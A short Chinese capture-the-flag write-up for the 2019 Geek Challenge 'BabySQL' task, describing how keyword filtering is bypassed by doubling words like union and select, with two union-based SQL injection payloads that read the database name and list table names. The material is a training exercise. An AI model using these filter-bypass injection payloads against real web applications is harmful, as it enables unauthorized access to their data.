[极客大挑战 2019]BabySQL 1

极客大挑战 2019BabySQL 1

文章目录

题目预览

基本测试

这里包数据包放到Burp的Repeater中继续进行

单引号测试报错,#号闭合回显,说明有SQL注入点

注意:这里面的空格用+号替换

查列数

回显发现过滤了or,by,回显中留下了der,判断是用replace替换过滤,后面用双写绕过

双写后继续测试

最后测试完是3列

测数据库

后续测试中过滤什么,就双写什么

sql 复制代码
ununionion+seselectlect+1,2,database()%23

测试到数据库是geek

测数据表

sql 复制代码
ununionion+seselectlect+1,2,group_concat(table_name)+frfromom+infoorrmation_schema.tables+whwhereere+table_schema='geek'%23

测数据字段

测字段值

完结~

相关推荐
破芽18 分钟前
mysql常用命令查询
数据库·sql·mysql
润乾软件9 小时前
SQLazy:分组累计求和
sql·sqlazy
慧都小项12 小时前
从 Burp Suite Professional 到 DAST:把 Web 安全测试接入持续 AppSec 的工程化路径
测试工具·web安全·网络安全·burp suite
2501_9151063214 小时前
安卓抓包软件2026,免证书抓包 应用层抓包 代理抓包全解析
网络协议·计算机网络·网络安全·ios·adb·https·udp
严谨的麻辣烫15 小时前
2026 年静态 IP 为什么重新受到关注?从住宅代理安全问题看固定网络出口
运维·服务器·tcp/ip·网络安全
菩提小狗15 小时前
每日安全情报报告 · 2026-09-02
网络安全·漏洞·cve·安全情报·每日安全
Databend15 小时前
Databend 增量物化视图:基于 Change Tracking 的增量刷新与一致性读取
大数据·数据库·sql
0xBADCODE16 小时前
CTF Writeup 合集
安全·web安全·网络安全·系统安全·密码学·php·ctf
数据知道17 小时前
恶意软件分析实验室搭建——沙箱、快照、网络隔离
网络·安全·web安全·网络安全
疯狂打码的少年18 小时前
【数据库技术】SQL数据查询(SELECT基本语法)
数据库·笔记·sql·oracle